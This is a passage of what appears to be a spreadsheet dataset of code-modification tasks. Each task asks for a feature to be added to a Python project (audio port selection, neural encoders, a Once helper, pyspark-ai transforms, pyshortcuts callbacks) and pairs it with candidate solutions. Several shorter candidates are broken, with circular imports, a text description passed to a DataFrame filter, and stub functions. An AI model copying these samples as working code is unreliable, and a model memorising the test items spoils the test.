self.index[2]\n            jack_ports = f\'{output}_jack_map\'\n            port_group = f\'{output}_port_group\'\n            \n            # #New - Validate ports configuration\n            if not ports:\n                logger.warning(f\'No ports available for output: {output}\')\n            \n            for i in self.channel_box:\n                self.channel_box.remove(i)\n            self.button_list = {}\n            \n            for channel in sink_channel_map:\n                hbox = Gtk.HBox(spacing=5)\n                label = Gtk.Label(label=channel)\n                label.set_size_request(100, 0)\n                hbox.pack_start(label, True, True, 0)\n                count = 0\n                self.button_list[channel] = {}\n                \n                for i in ports:\n                    self.button_list[channel][i] = Gtk.CheckButton(label=i)\n                    if self.pulse.config[self.index[0]][self.index[1]][port_group] is True or default is True:\n                        if count == sink_channel_map.index(channel):\n                            self.button_list[channel][i].set_active(True)\n                            # #New - Log default port selection\n                            logger.debug(f\'Set default port {i} for channel {channel}\')\n                    else:\n                        if jack_ports not in self.pulse.config[self.index[0]][self.index[1]]:\n                            self.pulse.config[self.index[0]][self.index[1]][jack_ports] = {}\n                            logger.debug(f\'Initialized jack_ports mapping for {jack_ports}\')\n                        \n                        if channel in self.pulse.config[self.index[0]][self.index[1]][jack_ports]:\n                            if i in self.pulse.config[self.index[0]][self.index[1]][jack_ports][channel]:\n                                self.button_list[channel][i].set_active(True)\n                                # #New - Log loaded port mapping\n                                logger.debug(f\'Loaded port mapping: {channel} -&gt; {i}\')\n                    \n                    hbox.pack_start(self.button_list[channel][i], True, True, 0)\n                    count += 1\n                \n                self.channel_box.pack_start(hbox, True, True, 0)\n\n            self.channel_box.show_all()\n            # #New - Log successful port list creation\n            logger.info(f\'Port list created successfully with {len(sink_channel_map)} channels\')\n        \n        except KeyError as ex:\n            # #New - Enhanced error logging for missing config keys\n            logger.error(f\'Missing configuration key while creating port list: {ex}\', exc_info=True)\n            raise\n        except Exception as ex:\n            # #New - Enhanced error logging for unexpected errors\n            logger.error(f\'Unexpected error while creating port list: {ex}\', exc_info=True)\n            raise\n\n    def apply(self, widget):\n        # #New - Log apply operation\n        logger.info(f\'Applying port selection for index: {self.index}\')\n        \n        jack_ports = f\'{self.index[2][0]}{self.index[2][1]}_jack_map\'\n        \n        try:\n            if self.toggle_grouping_setting.get_active() is True:\n                try:\n                    del self.pulse.config[self.index[0]][self.index[1]][jack_ports]\n                    # #New - Log port group deletion\n                    logger.info(f\'Deleted jack_ports mapping {jack_ports} (grouping enabled)\')\n                except Exception:\n                    logger.debug(f\'No existing jack_ports mapping to delete: {jack_ports}\')\n                return\n\n            self.pulse.config[self.index[0]][self.index[1]][jack_ports] = {}\n            # #New - Log port mapping initialization\n            logger.debug(f\'Initialized jack_ports mapping: {jack_ports}\')\n            \n            for source_port in self.button_list:\n                self.pulse.config[self.index[0]][self.index[1]][jack_ports][source_port] = []\n                for system_port in self.button_list[source_port]:\n                    if self.button_list[source_port][system_port].get_active() is True:\n                        self.pulse.config[self.index[0]][self.index[1]][jack_ports][source_port].append(system_port)\n                        # #New - Log individual port mapping\n                        logger.debug(f\'Mapped {source_port} -&gt; {system_port}\')\n            \n            # #New - Log successful apply\n            logger.info(f\'Port selection applied successfully. Total mappings: {len(self.pulse.config[self.index[0]][self.index[1]][jack_ports])}\')\n        \n        except Exception as ex:\n            # #New - Enhanced error logging for apply operation\n            logger.error(f\'Error applying port selection: {ex}\', exc_info=True)\n            raise\n\n    def toggle_grouping(self, widget, index, pulse):\n        # #New - Log grouping toggle\n        is_active = widget.get_active()\n        logger.info(f\'Toggling port grouping for {index[2]}: {is_active}\')\n        \n        try:\n            self.pulse.config[index[0]][index[1]][f\'{index[2][0]}{index[2][1]}_port_group\'] = is_active\n            \n            if is_active is False:\n                self.channel_box.set_sensitive(True)\n                logger.debug(\'Port grouping disabled - enabling channel box\')\n                self.create_port_list()\n            else:\n                logger.debug(\'Port grouping enabled - disabling channel box\')\n                self.create_port_list(default=True)\n                self.channel_box.set_sensitive(False)\n            \n            # #New - Log successful toggle\n            logger.info(f\'Port grouping toggled successfully to {is_active}\')\n        \n        except Exception as ex:\n            # #New - Enhanced error logging for toggle operation\n            logger.error(f\'Error toggling port grouping: {ex}\', exc_info=True)\n            raise\n\n# File 2: pulsemeeter/pulsemeeter/interface/__init__.py\n# #Modify - Enhanced import with logging configuration\nimport logging  # #New\nfrom .app_list_widget import AppList\nfrom .main_window import MainWindow\nfrom .eq_popover import EqPopover\nfrom .latency_popover import LatencyPopover\nfrom .rnnoise_popover import RnnoisePopover\nfrom .groups_popover import JackGroupsPopover\nfrom .port_select_popover import PortSelectPopover\nfrom .vumeter_widget import Vumeter\n\n# #New - Configure logging for interface module\nlogging.basicConfig(\n    level=logging.INFO,\n    format=\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\'\n)\n\n__all__ = [\n    \'MainWindow\',\n    \'AppList\',\n    \'EqPopover\',\n    \'LatencyPopover\',\n    \'RnnoisePopover\',\n    \'JackGroupsPopover\',\n    \'PortSelectPopover\',\n    \'Vumeter\',\n]'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class PortSelectPopover():\n    def __init__(self, button, pulse, index):\n        # Existing code...\n        self.PortSelect_Popover.popup()\n        #Modify\n        from .port_select_enhancement import PortSelectEnhancement\n        PortSelectEnhancement(pulse, index)\n        #End Modify', '#file 2': 'from .port_select_popover import PortSelectPopover\n\n# Existing code...\nPortSelectPopover(button, pulse, index)', '#file 3': "#New\nclass PortSelectEnhancement():\n    def __init__(self, pulse, index):\n        self.pulse = pulse\n        self.index = index\n        self.enhance_port_selection()\n\n    def enhance_port_selection(self):\n        # New feature implementation\n        print(f'Enhancing port selection for index: {self.index}')\n#End New"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'from .grid import GridEncoder', 'invoking_code_segment': 'from gridencoder import GridEncoder', 'feature_description': 'Add a custom encoder option to the `get_encoder` function that allows users to register and use custom encoder implementations alongside built-in encoders like frequency, sphere_harmonics, hashgrid, and tiledgrid.', 'modified_complete_code': '# File 1: TeCH/core/lib/gridencoder/__init__.py\nfrom .grid import GridEncoder\n\n# New: Custom encoder registry\n_custom_encoders = {}\n\ndef register_custom_encoder(name, encoder_class):\n    """Register a custom encoder class."""\n    _custom_encoders[name] = encoder_class\n\ndef get_custom_encoder(name):\n    """Retrieve a registered custom encoder."""\n    return _custom_encoders.get(name, None)\n\n# File 2: TeCH/core/lib/encoding.py\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass FreqEncoder_torch(nn.Module):\n    def __init__(self, input_dim, max_freq_log2, N_freqs,\n                 log_sampling=True, include_input=True,\n                 periodic_fns=(torch.sin, torch.cos)):\n    \n        super().__init__()\n\n        self.input_dim = input_dim\n        self.include_input = include_input\n        self.periodic_fns = periodic_fns\n\n        self.output_dim = 0\n        if self.include_input:\n            self.output_dim += self.input_dim\n\n        self.output_dim += self.input_dim * N_freqs * len(self.periodic_fns)\n\n        if log_sampling:\n            self.freq_bands = 2 ** torch.linspace(0, max_freq_log2, N_freqs)\n        else:\n            self.freq_bands = torch.linspace(2 ** 0, 2 ** max_freq_log2, N_freqs)\n\n        self.freq_bands = self.freq_bands.numpy().tolist()\n\n    def forward(self, input, **kwargs):\n\n        out = []\n        if self.include_input:\n            out.append(input)\n\n        for i in range(len(self.freq_bands)):\n            freq = self.freq_bands[i]\n            for p_fn in self.periodic_fns:\n                out.append(p_fn(input * freq))\n\n        out = torch.cat(out, dim=-1)\n\n        return out\n\n# New: Custom encoder registry\n_custom_encoders = {}\n\ndef register_custom_encoder(name, encoder_class):\n    """Register a custom encoder class to be used with get_encoder."""\n    _custom_encoders[name] = encoder_class\n\ndef get_encoder(encoding, input_dim=3, \n                multires=6, \n                degree=4,\n                num_levels=16, level_dim=2, base_resolution=16, log2_hashmap_size=19, desired_resolution=2048, align_corners=False, interpolation=\'linear\', input_bounds=None,\n                **kwargs):\n\n    if encoding == \'None\':\n        return lambda x, **kwargs: x, input_dim\n    \n    elif encoding == \'frequency_torch\':\n        encoder = FreqEncoder_torch(input_dim=input_dim, max_freq_log2=multires-1, N_freqs=multires, log_sampling=True)\n\n    elif encoding == \'frequency\': # CUDA implementation, faster than torch.\n        from freqencoder import FreqEncoder\n        encoder = FreqEncoder(input_dim=input_dim, degree=multires)\n\n    elif encoding == \'sphere_harmonics\':\n        from shencoder import SHEncoder\n        encoder = SHEncoder(input_dim=input_dim, degree=degree)\n\n    elif encoding == \'hashgrid\':\n        from gridencoder import GridEncoder\n        encoder = GridEncoder(input_dim=input_dim, num_levels=num_levels, level_dim=level_dim, base_resolution=base_resolution, log2_hashmap_size=log2_hashmap_size, desired_resolution=desired_resolution, gridtype=\'hash\', align_corners=align_corners, interpolation=interpolation)\n    \n    elif encoding == \'tiledgrid\':\n        from gridencoder import GridEncoder\n        encoder = GridEncoder(input_dim=input_dim, num_levels=num_levels, level_dim=level_dim, base_resolution=base_resolution, log2_hashmap_size=log2_hashmap_size, desired_resolution=desired_resolution, gridtype=\'tiled\', align_corners=align_corners, interpolation=interpolation)\n\n    # Modify: Check for custom encoders\n    elif encoding in _custom_encoders:\n        encoder_class = _custom_encoders[encoding]\n        encoder = encoder_class(input_dim=input_dim, **kwargs)\n\n    else:\n        raise NotImplementedError(f\'Unknown encoding mode: {encoding}. Choose from [None, frequency, frequency_torch, sphere_harmonics, hashgrid, tiledgrid] or register a custom encoder using register_custom_encoder()\')\n\n    return encoder, encoder.output_dim'}</t>
  </si>
  <si>
    <t>{'#file 1': "#Modify\ndef get_encoder(encoding, input_dim=3, multires=6, degree=4, num_levels=16, level_dim=2, base_resolution=16, log2_hashmap_size=19, desired_resolution=2048, align_corners=False, interpolation='linear', input_bounds=None, **kwargs):\n\n    if encoding == 'None':\n        return lambda x, **kwargs: x, input_dim\n    \n    elif encoding == 'frequency_torch':\n        encoder = FreqEncoder_torch(input_dim=input_dim, max_freq_log2=multires-1, N_freqs=multires, log_sampling=True)\n\n    elif encoding == 'frequency': # CUDA implementation, faster than torch.\n        from freqencoder import FreqEncoder\n        encoder = FreqEncoder(input_dim=input_dim, degree=multires)\n\n    elif encoding == 'sphere_harmonics':\n        from shencoder import SHEncoder\n        encoder = SHEncoder(input_dim=input_dim, degree=degree)\n\n    elif encoding == 'hashgrid':\n        from gridencoder import GridEncoder\n        encoder = GridEncoder(input_dim=input_dim, num_levels=num_levels, level_dim=level_dim, base_resolution=base_resolution, log2_hashmap_size=log2_hashmap_size, desired_resolution=desired_resolution, gridtype='hash', align_corners=align_corners, interpolation=interpolation)\n    \n    elif encoding == 'tiledgrid':\n        from gridencoder import GridEncoder\n        encoder = GridEncoder(input_dim=input_dim, num_levels=num_levels, level_dim=level_dim, base_resolution=base_resolution, log2_hashmap_size=log2_hashmap_size, desired_resolution=desired_resolution, gridtype='tiled', align_corners=align_corners, interpolation=interpolation)\n\n    elif encoding == 'custom':\n        from customencoder import CustomEncoder\n        encoder = CustomEncoder(input_dim=input_dim, output_dim=multires)\n\n    else:\n        raise NotImplementedError('Unknown encoding mode, choose from [None, frequency, sphere_harmonics, hashgrid, tiledgrid, custom]')\n\n    return encoder, encoder.output_dim", '#file 2': '#Modify\nencoder, encoder.output_dim = get_encoder(encoding, input_dim=input_dim, multires=multires, degree=degree, num_levels=num_levels, level_dim=level_dim, base_resolution=base_resolution, log2_hashmap_size=log2_hashmap_size, desired_resolution=desired_resolution, align_corners=align_corners, interpolation=interpolation, input_bounds=input_bounds)', '#file 3': '#New\nimport torch\nimport torch.nn as nn\n\nclass CustomEncoder(nn.Module):\n    def __init__(self, input_dim, output_dim):\n        super().__init__()\n        self.input_dim = input_dim\n        self.output_dim = output_dim\n        self.linear = nn.Linear(input_dim, output_dim)\n\n    def forward(self, input):\n        return self.linear(input)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'Once class and its do() method in offset/offset/sync/once.py', 'invoking_code_segment': 'from .once import Once in offset/offset/sync/__init__.py', 'feature_description': 'Add logging functionality to the Once class to keep track of function calls, including logging when a function is executed for the first time and when subsequent calls are skipped.', 'modified_complete_code': '# offset/offset/sync/once.py\n# -*- coding: utf-8 -*-\n#\n# This file is part of offset. See the NOTICE for more information.\n\nimport functools\nimport logging\n\nfrom .atomic import AtomicLong\nfrom .mutex import Mutex\n\n# New: Initialize logger for Once class\nlogger = logging.getLogger(__name__)\n\nclass Once(object):\n    """ Once is an object that will perform exactly one action. """\n\n    def __init__(self):\n        self.m = Mutex()\n        self.done = AtomicLong(0)\n        # New: Add call counter and function name tracking\n        self.call_count = 0\n        self.executed_function = None\n\n    def do(self, func):\n        """ Do calls the function f if and only if the method is being called for the\n        first time.\n\n        ex::\n\n            once = Once()\n\n            @once.do\n            def f():\n                return\n\n            # or\n            once.do(f)()\n\n        if once.do(f) is called multiple times, only the first call will invoke\n        f.\n        """\n\n        @functools.wraps(func)\n        def _wrapper(*args, **kwargs):\n            # New: Increment call count and log\n            self.call_count += 1\n            logger.debug(f"Once.do() called {self.call_count} time(s) for function \'{func.__name__}\'")\n            \n            if self.done == 1:\n                # New: Log when function execution is skipped\n                logger.debug(f"Function \'{func.__name__}\' already executed, skipping call #{self.call_count}")\n                return\n\n            with self.m:\n                if self.done == 0:\n                    # New: Log function execution\n                    logger.info(f"Executing function \'{func.__name__}\' for the first time")\n                    self.executed_function = func.__name__\n                    func(*args, **kwargs)\n                    self.done.value = 1\n                    # New: Log successful execution\n                    logger.info(f"Function \'{func.__name__}\' executed successfully")\n\n        return _wrapper\n\n    # New: Add method to get execution statistics\n    def get_call_stats(self):\n        """Returns statistics about function calls."""\n        return {\n            \'total_calls\': self.call_count,\n            \'executed\': self.done == 1,\n            \'function_name\': self.executed_function\n        }\n\n\n# offset/offset/sync/__init__.py\n# -*- coding: utf-8 -*-\n#\n# This file is part of offset. See the NOTICE for more information.\n\n# New: Import logging configuration\nimport logging\n\nfrom .sema import Semaphore\nfrom .mutex import Mutex\nfrom .once import Once\nfrom .cond import Cond\nfrom .rwmutex import RWMutex\nfrom .waitgroup import WaitGroup\n\n# New: Configure logging for sync module\nlogging.getLogger(__name__).addHandler(logging.NullHandler())'}</t>
  </si>
  <si>
    <t>{'#file 1': '# -*- coding: utf-8 -\n# This file is part of offset. See the NOTICE for more information.\n\nimport functools\n\nfrom .atomic import AtomicLong\nfrom .mutex import Mutex\n\nclass Once(object):\n    def __init__(self):\n        self.m = Mutex()\n        self.done = AtomicLong(0)\n\n    def do(self, func):\n        @functools.wraps(func)\n        def _wrapper(*args, **kwargs):\n            if self.done == 1:\n                return\n\n            with self.m:\n                if self.done == 0:\n                    func(*args, **kwargs)\n                    self.done.value = 1\n\n        return _wrapper\n\n#Modify: Update to use LoggingOnce\nfrom .logging_once import LoggingOnce\n\nclass Once(LoggingOnce):\n    pass', '#file 2': '# -*- coding: utf-8 -\n# This file is part of offset. See the NOTICE for more information.\n\nfrom .once import Once\n\nonce = Once()\n\n@once.do\ndef f():\n    return\n\n# or\nonce.do(f)()\n\n#Modify: Update to use LoggingOnce\nfrom .logging_once import LoggingOnce\n\nonce = LoggingOnce()\n\n@once.do\ndef f():\n    return\n\n# or\nonce.do(f)()', '#file 3': '# -*- coding: utf-8 -\n# This file is part of offset. See the NOTICE for more information.\n\nimport functools\n\nfrom .once import Once\n\nclass LoggingOnce(Once):\n    def __init__(self):\n        super(LoggingOnce, self).__init__()\n        self.log = []\n\n    def do(self, func):\n        @functools.wraps(func)\n        def _wrapper(*args, **kwargs):\n            if self.done == 1:\n                return\n\n            with self.m:\n                if self.done == 0:\n                    func(*args, **kwargs)\n                    self.done.value = 1\n                    self.log.append((func.__name__, args, kwargs))\n\n        return _wrapper\n\n#New: Add method to retrieve log\n    def get_log(self):\n        return self.log'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'main() function from phomber.phomber module', 'invoking_code_segment': 'run_phomber() function calling main()', 'feature_description': 'Add a new feature to print a message when the application starts', 'modified_complete_code': "# phomber/__init__.py\n__project__ = 'ph0mber'\n__version__ = '3.0'\n__dev__ = 's41r4j'\n__website__ = 'https://github.com/phomber'\n__twitter__ = 'https://twitter.com/s41r4j'\n__instagram__ = 'https://instagram.com/s41r4j'\n\n# phomber/__main__.py\nfrom phomber.phomber import main\n\n# New: Function to print startup message\ndef print_startup_message():\n    print('[*] Starting ph0mber v3.0')\n    print('[*] Developer: s41r4j')\n    print('[*] Website: https://github.com/phomber')\n\n# Used to run phomber as cli application\ndef run_phomber():\n    try:\n        # New: Print startup message when application starts\n        print_startup_message()\n        # Modify: Call main function\n        main()\n    except KeyboardInterrupt:\n        print('[!] Force Terminate')"}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify\ndef main():\n    new_feature()  # New\n    # Main function logic here', '#file 2': "#Modify\ndef run_phomber():\n    try:\n      new_feature()  # New\n      main()\n    except KeyboardInterrupt:\n      print('[!] Force Terminate')", '#file 3': "#New\ndef new_feature():\n    print('New feature executed')"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def transform_df(self, df: DataFrame, desc: str, cache: bool = True) -&gt; DataFrame', 'invoking_code_segment': 'transformed_df = df.ai.transform("what is the name with oldest age?")', 'feature_description': 'Add a new transformation function to handle more complex transformation logic with support for multi-step transformations, custom validation, and transformation history tracking.', 'modified_complete_code': '# File 1: pyspark-ai/pyspark_ai/pyspark_ai.py\n\n# #Modify - Add new import for transformation tracking\nfrom typing import Callable, List, Optional, Dict, Any\nfrom collections import defaultdict\n\nclass SparkAI:\n    def __init__(self, ...):\n        # ... existing code ...\n        # #New - Add transformation history tracking\n        self._transformation_history: Dict[str, List[Dict[str, Any]]] = defaultdict(list)\n        self._sql_agent = None\n        self._sql_chain = None\n\n    # #New - Add new method for complex transformations\n    def _validate_transformation(self, df: DataFrame, validation_desc: str) -&gt; bool:\n        """\n        Validate a transformation result using LLM-based validation.\n        \n        :param df: The DataFrame to validate\n        :param validation_desc: Description of validation criteria\n        :return: True if validation passes, False otherwise\n        """\n        tags = self._get_tags(cache=True)\n        llm_output = self._verify_chain.run(tags=tags, df=df, desc=validation_desc)\n        codeblocks = AIUtils.extract_code_blocks(llm_output)\n        llm_output = "\\n".join(codeblocks)\n        \n        locals_ = {}\n        try:\n            exec(compile(llm_output, "validate-CodeGen", "exec"), {"df": df}, locals_)\n            return locals_.get("result", False)\n        except Exception as e:\n            self.log(f"Validation failed: {str(e)}")\n            return False\n\n    # #New - Add new method for multi-step transformations\n    def transform_df_with_steps(self, df: DataFrame, steps: List[str], cache: bool = True) -&gt; DataFrame:\n        """\n        Apply multiple transformation steps sequentially with validation between steps.\n        \n        :param df: The input Spark DataFrame\n        :param steps: List of transformation descriptions to apply sequentially\n        :param cache: Whether to use caching\n        :return: The transformed DataFrame after all steps\n        """\n        result_df = df\n        transformation_id = random_view_name(df)\n        \n        for idx, step_desc in enumerate(steps):\n            self.log(f"Applying transformation step {idx + 1}/{len(steps)}: {step_desc}")\n            result_df = self.transform_df(result_df, step_desc, cache)\n            \n            # Track transformation history\n            self._transformation_history[transformation_id].append({\n                "step": idx + 1,\n                "description": step_desc,\n                "row_count": result_df.count()\n            })\n        \n        return result_df\n\n    # #Modify - Enhanced transform_df with optional validation\n    def transform_df(self, df: DataFrame, desc: str, cache: bool = True, validate: Optional[str] = None) -&gt; DataFrame:\n        """\n        This method applies a transformation to a provided Spark DataFrame,\n        the specifics of which are determined by the \'desc\' parameter.\n\n        :param df: The Spark DataFrame that is to be transformed.\n        :param desc: A natural language string that outlines the specific transformation to be applied on the DataFrame.\n        :param cache: If `True`, fetches cached data, if available. If `False`, retrieves fresh data and updates cache.\n        :param validate: Optional validation description to verify transformation result\n        :return: Returns a new Spark DataFrame that is the result of applying the specified transformation on the input DataFrame.\n        """\n        sql_query = self._get_transform_sql_query(df, desc, cache)\n        result_df = self._spark.sql(sql_query)\n        \n        # #New - Add optional validation step\n        if validate is not None:\n            is_valid = self._validate_transformation(result_df, validate)\n            if not is_valid:\n                self.log(f"Warning: Transformation validation failed for: {validate}")\n        \n        return result_df\n\n    # #New - Add method to get transformation history\n    def get_transformation_history(self, transformation_id: str) -&gt; List[Dict[str, Any]]:\n        """\n        Retrieve the history of transformations applied.\n        \n        :param transformation_id: The ID of the transformation sequence\n        :return: List of transformation steps with metadata\n        """\n        return self._transformation_history.get(transformation_id, [])\n\n# File 2: pyspark-ai/tests/test_end_to_end.py\n\n# #Modify - Enhanced test with new transformation features\ndef test_dataframe_transform(self):\n    df = self.spark_ai._spark.createDataFrame(\n        [\n            ("Alice", 1),\n            ("Bob", 2),\n        ],\n        ["name", "age"],\n    )\n    # #Modify - Original transformation call\n    transformed_df = df.ai.transform("what is the name with oldest age?")\n    self.assertEqual(transformed_df.collect()[0][0], "Bob")\n\n# #New - Add test for multi-step transformations\ndef test_dataframe_transform_with_steps(self):\n    df = self.spark_ai._spark.createDataFrame(\n        [\n            ("Alice", 1, "Engineering"),\n            ("Bob", 2, "Sales"),\n            ("Charlie", 3, "Engineering"),\n        ],\n        ["name", "age", "department"],\n    )\n    # Apply multiple transformation steps\n    steps = [\n        "filter for Engineering department",\n        "order by age descending"\n    ]\n    transformed_df = self.spark_ai.transform_df_with_steps(df, steps)\n    result = transformed_df.collect()\n    self.assertEqual(result[0][0], "Charlie")\n\n# #New - Add test for transformation with validation\ndef test_dataframe_transform_with_validation(self):\n    df = self.spark_ai._spark.createDataFrame(\n        [\n            ("Alice", 1),\n            ("Bob", 2),\n        ],\n        ["name", "age"],\n    )\n    # Apply transformation with validation\n    transformed_df = df.ai.transform(\n        "what is the name with oldest age?",\n        validate="the result should contain exactly one row"\n    )\n    self.assertEqual(len(transformed_df.collect()), 1)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def test_dataframe_transform(self):\n        df = self.spark_ai._spark.createDataFrame(\n            [\n                ("Alice", 1),\n                ("Bob", 2),\n            ],\n            ["name", "age"],\n        )\n        #Modify: Use the new transformation function\n        transformed_df = new_transform_function(df, "what is the name with oldest age?")\n        self.assertEqual(transformed_df.collect()[0][0], "Bob")', '#file 2': 'class EndToEndTestCaseGPT35(unittest.TestCase):\n    def setUp(self):\n        self.spark = (\n            SparkSession.builder.master("local[*]")\n            .appName("End2end-tests")\n            .getOrCreate()\n        )\n        self.setup_spark_ai(self.spark)\n        #New: Import the new transformation function\n        from new_file import new_transform_function', '#file 3': 'def new_transform_function(df, desc):\n    # New function to handle additional transformation logic\n    # This function can be extended with more complex logic as needed\n    return df.filter(desc)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'make_shortcut() function in pyshortcuts/__init__.py (imported from platform-specific modules)', 'invoking_code_segment': 'make_shortcut() call in examples/gui_bootstrap.py', 'feature_description': 'Add support for custom shortcut creation logic by introducing a ShortcutConfig class and callback mechanism that allows users to define custom logic before and after shortcut creation, enabling extensibility for different use cases and platforms.', 'modified_complete_code': '# pyshortcuts/pyshortcuts/__init__.py\n#!/usr/bin/env python\n\nfrom pyshortcuts.version import version as __version__\n\nimport os\nimport sys\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\nfrom collections import namedtuple\n\nUserFolders = namedtuple("UserFolders", ("home", "desktop", "startmenu"))\n\nuname = sys.platform\nif os.name == "nt":\n    uname = "win"\nif uname == "linux2":\n    uname = "linux"\n\nfrom .linux import (scut_ext, ico_ext, make_shortcut,\n                    get_folders, get_homedir, get_desktop)\n\nif uname.startswith(\'win\'):\n    from .windows import (scut_ext, ico_ext, make_shortcut,\n                          get_folders, get_homedir, get_desktop)\n\nelif uname.startswith(\'darwin\'):\n    from .darwin import (scut_ext, ico_ext, make_shortcut,\n                         get_folders, get_homedir, get_desktop)\n\nfrom .shortcut import shortcut, Shortcut, fix_filename\n\n# for back-compat\nfrom . import utils\nutils.get_homedir = get_homedir\nutils.get_folders = get_folders\nutils.platform = platform = uname\n\n# New: ShortcutConfig class for custom shortcut creation logic\nclass ShortcutConfig:\n    """Configuration class for custom shortcut creation logic"""\n    def __init__(self):\n        self.pre_create_callbacks = []\n        self.post_create_callbacks = []\n    \n    def add_pre_create_callback(self, callback):\n        """Add callback to execute before shortcut creation"""\n        self.pre_create_callbacks.append(callback)\n    \n    def add_post_create_callback(self, callback):\n        """Add callback to execute after shortcut creation"""\n        self.post_create_callbacks.append(callback)\n    \n    def execute_pre_create(self, **kwargs):\n        """Execute all pre-create callbacks"""\n        for callback in self.pre_create_callbacks:\n            callback(**kwargs)\n    \n    def execute_post_create(self, result, **kwargs):\n        """Execute all post-create callbacks"""\n        for callback in self.post_create_callbacks:\n            callback(result, **kwargs)\n\n# New: Global shortcut config instance\n_shortcut_config = ShortcutConfig()\n\ndef get_shortcut_config():\n    """Get the global shortcut configuration instance"""\n    return _shortcut_config\n\ndef get_cwd():\n    """get current working directory\n    Note: os.getcwd() can fail with permission error.\n\n    when that happens, this changes to the users `HOME` directory\n    and returns that directory so that it always returns an existing\n    and readable directory.\n    """\n    try:\n        return os.getcwd()\n    except:\n        home = get_homedir()\n        os.chdir(home)\n        return home\n\ntry:\n    import wx\n    HAS_WX = True\n    from .wxgui import ShortcutFrame\nexcept ImportError:\n    HAS_WX = False\n\n\ndef shortcut_cli():\n    \'\'\'\n    command-line interface to creating desktop shortcuts\n    \'\'\'\n    desc = \'create desktop and start menu shortcuts\'\n    version_string = \'pyshortcuts %s\' % (__version__)\n\n\n    parser = ArgumentParser(description=desc, # version=version_string,\n                            formatter_class=RawDescriptionHelpFormatter)\n\n\n    parser.add_argument(\'-v\', \'--version\', dest=\'version\', action=\'store_true\',\n                        default=False, help=\'show version\')\n\n    parser.add_argument(\'-n\', \'--name\', dest=\'name\', default=None,\n                        help=\'name for shortcut link\')\n\n    parser.add_argument(\'-i\', \'--icon\', dest=\'icon\', default=None,\n                        help=\'name of icon file\')\n\n    parser.add_argument(\'-f\', \'--folder\', dest=\'folder\', default=None,\n                        help=\'subfolder on desktop to put shortcut\')\n\n    parser.add_argument(\'-e\', \'--executable\', dest=\'exe\', default=None,\n                        help=\'name of executable to use (python)\')\n\n    parser.add_argument(\'-x\', \'--no-executable\', dest=\'noexe\', action=\'store_true\',\n                        default=False, help=\'use no implied executable [False]\')\n\n    parser.add_argument(\'-t\', \'--terminal\', dest=\'terminal\', action=\'store_true\',\n                        default=True, help=\'run script in a Terminal [True]\')\n\n    parser.add_argument(\'-g\', \'--gui\', dest=\'gui\', action=\'store_true\',\n                        default=False, help=\'run script as GUI, with no Terminal [False]\')\n\n    parser.add_argument(\'-d\', \'--desktop\', dest=\'desktop\', action=\'store_true\',\n                        default=True, help=\'create desktop shortcut [True]\')\n\n    parser.add_argument(\'-s\', \'--startmenu\', dest=\'startmenu\', action=\'store_true\',\n                        default=True, help=\'create Start Menu shortcut [True]\')\n\n    parser.add_argument(\'-w\', \'--wxgui\', dest=\'wxgui\', action=\'store_true\',\n                        default=False, help=\'run GUI version of pyshortcut [False]\')\n\n    parser.add_argument(\'-b\', \'--bootstrap\', dest=\'bootstrap\', action=\'store_true\',\n                        default=False, help=\'make desktop shortcut to wxGUI\')\n\n    parser.add_argument(\'scriptname\', nargs=\'?\',\n                        help=\'script name, including arguments\')\n\n    args = parser.parse_args()\n\n    if args.version:\n        print("pyshortcut {:s}".format(__version__))\n\n    if (args.wxgui or args.bootstrap) and not HAS_WX:\n        print("wxpython is required to run GUI")\n        sys.exit()\n\n    if args.bootstrap:\n        bindir = \'bin\'\n        if uname.startswith(\'win\'):\n            bindir = \'Scripts\'\n        here, this = os.path.split(os.path.abspath(__file__))\n        icon = os.path.join(here, \'icons\', \'ladder.%s\' % ico_ext[0])\n        script = "%s --wxgui" % os.path.join(sys.prefix, bindir, \'pyshortcut\')\n        # Modify: Execute pre-create callbacks before shortcut creation\n        config = get_shortcut_config()\n        config.execute_pre_create(script=script, name=\'PyShortcut\', terminal=False, icon=icon)\n        result = make_shortcut(script, name=\'PyShortcut\', terminal=False, icon=icon)\n        # Modify: Execute post-create callbacks after shortcut creation\n        config.execute_post_create(result, script=script, name=\'PyShortcut\', terminal=False, icon=icon)\n\n    elif args.wxgui:\n        app = wx.App()\n        ShortcutFrame().Show(True)\n        app.MainLoop()\n\n    else:\n        if args.gui:\n            args.terminal = False\n\n        if args.scriptname is None:\n            print("pyshortcut: must provide one script.  try \'pyshortcut -h\'")\n        else:\n            # Modify: Execute pre-create callbacks before shortcut creation\n            config = get_shortcut_config()\n            config.execute_pre_create(scriptname=args.scriptname, name=args.name, terminal=args.terminal, folder=args.folder, icon=args.icon, desktop=args.desktop, startmenu=args.startmenu, executable=args.exe, noexe=args.noexe)\n            result = make_shortcut(args.scriptname, name=args.name,\n                          terminal=args.terminal, folder=args.folder,\n                          icon=args.icon, desktop=args.desktop,\n                          startmenu=args.startmenu, executable=args.exe,\n                          noexe=args.noexe)\n            # Modify: Execute post-create callbacks after shortcut creation\n            config.execute_post_create(result, scriptname=args.scriptname, name=args.name, terminal=args.terminal, folder=args.folder, icon=args.icon, desktop=args.desktop, startmenu=args.startmenu, executable=args.exe, noexe=args.noexe)\n\n# pyshortcuts/examples/gui_bootstrap.py\n#!/usr/bin/env python\nimport os\nimport sys\nfrom pyshortcuts import make_shortcut, platform, get_shortcut_config\n\n# New: Define custom pre-create callback\ndef custom_pre_create(**kwargs):\n    """Custom logic before shortcut creation"""\n    print("Preparing to create shortcut with custom logic...")\n    print("Script: %s" % kwargs.get(\'script\', \'N/A\'))\n\n# New: Define custom post-create callback\ndef custom_post_create(result, **kwargs):\n    """Custom logic after shortcut creation"""\n    print("Shortcut created successfully!")\n    if result:\n        print("Shortcut target: %s" % result.target)\n\n# New: Register custom callbacks\nconfig = get_shortcut_config()\nconfig.add_pre_create_callback(custom_pre_create)\nconfig.add_post_create_callback(custom_post_create)\n\nbindir = \'bin\'\nif platform.startswith(\'win\'):\n    bindir = \'Scripts\'\n\nscut = make_shortcut(\n    